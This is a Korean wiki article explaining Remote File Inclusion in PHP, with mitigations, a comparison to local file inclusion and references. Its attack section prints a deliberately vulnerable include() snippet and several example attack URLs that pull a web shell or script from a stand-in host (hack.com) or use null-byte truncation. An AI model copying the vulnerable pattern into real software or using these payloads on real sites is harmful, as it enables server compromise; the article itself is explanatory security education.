원격파일삽입

원격파일삽입(Remote file inclusion, RFI)는 취약점을 이용한 공격은 공격자가 악성 스크립트를 서비스 서버에 전달하여 해당 페이지를 통하여 전달한 악성 코드가 실행되도록 하는 것이다. 쉽게 말해서 웹 애플리케이션에 공격자가 자신의 코드를 원격으로 삽입 가능하다는 것이다.

개요[편집]

원격파일삽입은 취약점을 이용한 공격은 공격자가 악성 스크립트를 웹서버에 전달하여 해당 페이지를 통하여 전달한 악성 코드가 실행되도록 하는 것이다. 쉽게 말해서 웹 애플리케이션에 공격자 자신의 코드를 원격으로 삽입 가능하다는 것이다.

특징[편집]

아큐네틱스(Acunetix) 취약성 스캐너를 사용하여 자동화된 웹 스캔을 실행하면 웹 사이트 또는 웹 애플리케이션이 원격파일삽입 및 에스큐엘 인젝션(SQL Injection), 디렉터리 탐색 등과 같은 기타 취약성에 취약한지 쉽게 테스트 할 수 있다. 데모를 통해 사이버 보안을 유지하기 위해 웹 사이트 또는 웹 애플리케이션에 대해 스캔을 실행하는 방법에 대해 자세히 알아볼 수 있다. 원격파일삽입 취약성을 발견한 경우 이를 제거하는 가장 좋은 방법은 사용자 입력을 기반으로 파일을 포함하지 않는 것이다. 이것이 가능하지 않은 경우 애플리케이션은 포함될 수 있는 파일의 화이트리스트를 유지해야 한다. 이 경우 입력 유효성 검사는 공격자가 영리한 트릭을 사용하여 주변을 이동할 수 있기 때문에 훨씬 덜 효과적인 방법이다. 또한 PHP 응용 프로그램의 경우 대부분의 최신 설치는 php. ini에서 allow_url_include가 off로 설정되어 구성된다. 이로 인해 악의적인 사용자가 원격 파일을 포함할 수 없다. 그러나 이러한 경우에도 로컬파일삽입(LFI)이 여전히 가능하다.^[1]

악성 파일 실행

원격파일삽입에 취약한 코드는 공격자가 악의적인 코드와 데이터의 삽입을 허용함으로써 전체 서버 훼손과 같은 파괴적인 공격을 가할 수 있다. 악성 파일 실행 공격은 PHP, XML, 사용자로부터 파일명이나 파일을 받아들이는 프레임워크에 영향을 준다. URL과 파일시스템 참조 등 외부객체 참조를 사용하는 애플리케이션에서 입력파일 및 입력 외부객체를 검증하지 않을 경우에 발생하며, 공격자는 원격코드 실행과 원격 루트킷 설치 및 시스템 손상을 야기한다. 이를 위해서 사용자로부터 입력 받는 모든 값을 서버에서 검증후에 사용해야 하며, 입력되는 특수 문자는 엔티티(entity) 형태로 변경하여 저장해야 한다.

공격 방법[편집]

원격파일삽입의 공격 방법으로는 URL 공격이 있다. 원격파일삽입의 취약점을 이해하기 위해서는 먼저 PHP의 include 함수에 대해 알고 있어야 한다. Include() 함수는 주로 모든 페이지에 포함될 표준 헤더 및 메뉴들을 파일로 만들어서 포함할 때 사용된다. 함수 내에서 include에 의해 파일 호출이 발생한다면, 호출된 파일 안의 모든 코드가 그 함수에서 정의된 것처럼 동작한다. include 함수의 사용법은 총 3가지로 사용될 수 있다. 첫 번째는 Include(‘URL’)이다. 이 방법은 URL을 현재 페이지에서 호출하는 것이다. 두번째는 Include($dir)이다. $dir변수의 값을 현재 페이지에서 호출하는 방법이다. 마지막으로 세 번째로는 Include($dir.’.PHP’)이다. 변수를 호출할 때 변수뒤에. php를 붙인 상태로 호출하는 방법이다. 원격파일삽입 취약점이 존재하는 코드는 다음과 같다. 아래의 코드의 경우 최종적으로 [http://hack.com/bad.php?.php] 가 되고 이 값에서. php는 변수가 사용하지 않는 변수이기 때문에 무시되고 완전한 형태의 [http://hack.com/bad.php]가 삽입되는 것이다.^[2]

<?php 
$color=’blue’; 
if(isset($_GET[‘COLOR’])) //COLOR=http://hack.com/bad.php? 
$color=$_GET[‘COLOR’]; //$color=http://hack.com/bad.php? 로 변수가 설정 
include($color.’.php’); //include(“http://hack.com/bad.php?”.’.php’); 
?>

취약점 공격

CASE1(http://www.plura.io/color.php?COLOR=http://hack.com/hack.php)

$color 변수에 URL 삽입을 시도하지만, 실패로 나타난다. 이때 오류 구문을 보면 hack. php. php 의 형태로 변하게 된다.

CASE2(http://www.plura.io/color.php?COLOR=http://hack.com/webshell.txt?)

종단 문자를 사용하여 원격지의 파일을 포함 시킨다.

CASE3(http://www.plura.io/color.php?COLOR=C:\ftp\upload\exploit)

공격전에 미리 업로드한 파일을 호출하여 exploit. php파일로 만들어 RFI 공격을 실행할 수 있다.

CASE4(http://www.plura.io/color.php?COLOR=C:\notes.txt%00)

NULL Meta 문자(% 00)를 삽입하여. php 확장자를 제거하고 다른 파일로 접근이 가능하게 만든다.

대응방안[편집]

관리자는 소스 코드에 include, require 등의 구문/함수가 존재하는지 검증하고, 만약 사용자의 입력값을 통해 파일명이 결정된다면 외부의 악의적인 파일이 포함되어 실행되지 않도록 PHP 설정 파일인 php. ini 파일에서 allow_URL_open을 off 설정하여준다.^[3]

비교[편집]

로컬파일삽입

원격파일삽입은 공격자의 PC에서 유래하는 것이고, 로컬파일삽입(LFI)은 피해자의 PC에서 유래하는 것이다. 원격파일삽입은 공격자의 PC에 존재하는 파일을 열어보거나 혹은 공격자가 만들어놓은 사이트에 접속해서 희생자의 PC에 오는 것이고, 로컬파일삽입은 희생자의 컴퓨터 내에 존재하고 있는 것을 대상으로 하는 것이다.^[4] 원격파일삽입과 마찬가지로 로컬파일삽입은 웹 브라우저를 통해 서버에 악성 파일을 업로드하는 벡터이다. 두 벡터는 종종 파일 포함 공격의 맥락에서 함께 참조된다. 두 경우 모두 공격이 성공하면 악성 코드가 대상 서버에 업로드된다. 그러나, 원격파일삽입과 달리 로컬파일삽입 공격은 사용자가 제공/제어된 입력을 검증하지 못하는 안전하지 않은 로컬 파일 업로드 기능을 악용하는 것을 목표로 한다. 그 결과 악의적인 캐릭터 업로드와 디렉터리/경로 통과 공격이 허용된다. 그런 다음 가해자는 원격 위치에서 강화된 외부 참조 기능을 사용하여 검색하는 것과 달리 악성 코드를 손상된 시스템에 직접 업로드 할 수 있다.^[5]

각주[편집]

↑ 이안 무스카트, 〈RFI (원격 파일 포함) 란 무엇입니까?〉, 《아큐네틱스》, 2020-04-02
↑ PLURA, 〈RFI 대응방안〉, 《프루라 공식 블로그》, 2017-10-24
↑ Motie_FireWall, 〈파일 삽입 (File Inclusion) 취약점〉, 《티스토리》, 2020-04-23
↑ dongil7754, 〈RFI와 LFI !〉, 《네이버 블로그》, 2016-07-18
↑ 〈원격 파일 포함 (RFI)〉, 《임프리바》

참고 자료[편집]

dongil7754, 〈RFI와 LFI !〉, 《네이버 블로그》, 2016-07-18
〈원격 파일 포함 (RFI)〉, 《임프리바》
이안 무스카트, 〈RFI (원격 파일 포함) 란 무엇입니까?〉, 《아큐네틱스》, 2020-04-02
PLURA, 〈RFI 대응방안〉, 《프루라 공식 블로그》, 2017-10-24
Motie_FireWall, 〈파일 삽입 (File Inclusion) 취약점〉, 《티스토리》, 2020-04-23

같이보기[편집]

해킹
RFI

이 원격파일삽입 문서는 보안에 관한 글로서 검토가 필요합니다. 위키 문서는 누구든지 자유롭게 편집할 수 있습니다. [편집]을 눌러 문서 내용을 검토·수정해 주세요.

개발 : 프로그래밍, 소프트웨어, 데이터, 솔루션, 보안 ^□^■^⊕, 하드웨어, 컴퓨터, 사무자동화, 인터넷, 모바일, 사물인터넷, 게임, 메타버스, 디자인

보안	CVE • CWE • 관리자권한 • 관리적 보안 • 권한 • 권한관리 • 금융 분산원장기술 보안규범 • 기밀 • 기밀성 • 기술적 보안 • 누설 • 누출 • 누출금지정보 • 니모닉 • 데이터베이스 암호화 • 디지털 워터마킹 • 레인보우 테이블 • 루트킷 • 무결성 • 물리적 보안 • 백신 프로그램 • 버그 바운티 • 보안 • 봇 • 봇넷 • 블랙리스팅 • 블랙박스 • 블록체인 보안 • 비밀 • 비회원 권한 • 사고 • 사용자권한 • 사회공학 • 생체인증 • 시큐어코딩 • 신뢰실행환경 • 암호 • 암호키 • 예방 • 유출 • 이중인증(2FA) • 인증 • 일회용 비밀번호(OTP) • 잠금장치(시건장치) • 접근 • 접근권한 • 접근제어 • 접근차단 • 정보보호관리체계 • 침입방지시스템 • 침입탐지시스템 • 컴퓨터 바이러스 • 킬 스위치 • 통합위협관리(UTM) • 패치 • 페이로드 • 핀(PIN) • 해킹사고 • 화이트박스 • 회원권한 • 효율성

취약점 공격	51% 공격 • OWASP • 그라인딩 공격 • 네트워크 공격 • 누킹 • 디도스 • 디엔에스 스푸핑(DNS스푸핑) • 랜섬웨어 • 레베톤 • 레이스 공격 • 롱레인지 공격 • 리플레이 공격 • 리플레이 프로텍션 • 멀웨어(악성코드) • 모의해킹 • 무차별 대입 공격 • 미라이 봇넷 • 백도어 • 버그 • 버퍼 오버플로 • 벡터76 공격 • 부채널 공격 • 블랙해커 • 블록보류 공격 • 블록체인 해킹 • 사이트 간 스크립팅(XSS) • 사이트 간 요청 위조(CSRF) • 사전공격 • 셸쇼크 • 스누핑 • 스니퍼 • 스니핑 • 스미싱 • 스파이웨어 • 스푸핑 • 시빌공격 • 아이피 스푸핑(IP스푸핑) • 암호화폐 거래소 해킹 • 암호화폐 해킹 • 애드웨어 • 에스큐엘 인젝션(SQL인젝션) • 에이알피 스푸핑(ARP스푸핑) • 원격파일삽입 • 웜 • 웹셸 • 이클립스 공격 • 인젝션 • 제로데이 공격 • 중간자 공격 • 지능형 지속 공격(APT) • 취약점 • 침해사고 • 크래킹 • 크립토락커 • 크립토재킹 • 키로깅 • 트로이목마 • 패스워드 크래킹 • 페니스펜드 • 포맷스트링 공격 • 피니 공격 • 피싱 • 해커 • 해커원 • 해킹 • 혹스 • 화이트해커

개인정보보호	가명 • 개인정보 • 개인정보보호 • 개인정보보호법 • 성명 • 실명 • 유럽연합 일반개인정보보호법(GDPR) • 익명

양자보안	광자분리공격(PNS) • 복제 불가능성 원리 • 양자보안 • 측정 후 붕괴

보안 솔루션	V1 • V3 • ZAP • 내PC지키미 • 노턴안티바이러스 • 디아모 • 랩스플러스 • 레드마인 • 레드캐슬 • 맥아피 • 버그질라 • 빅룩 • 빅룩와스 • 빅룩퓨저 • 샤크라 • 소나큐브 • 스패로우 • 스팸스나이퍼 • 시큐브토스 • 시큐어디비 • 아베스트 • 야스카 • 엔스토커 • 엔프로텍트 • 와플즈 • 웹필터 • 제큐어디비 • 제큐어웹 • 지라 • 카스퍼스키 • 파인드벅스 • 피엠디(PMD)

위키 : 자동차, 교통, 지역, 산업, 기업, 단체, 업무, 쇼핑, 블록체인, 암호화폐, 인공지능, 개발, 인물, 행사, 일반

[1] 이안 무스카트, 〈RFI (원격 파일 포함) 란 무엇입니까?〉, 《아큐네틱스》, 2020-04-02

[2] PLURA, 〈RFI 대응방안〉, 《프루라 공식 블로그》, 2017-10-24

[3] Motie_FireWall, 〈파일 삽입 (File Inclusion) 취약점〉, 《티스토리》, 2020-04-23

[4] 7754, 〈RFI와 LFI !〉, 《네이버 블로그》, 2016-07-18

[5] 〈원격 파일 포함 (RFI)〉, 《임프리바》

[1]

[2]

[3]

[4]

[5]

위키

이름공간

변수

보기

더 보기

검색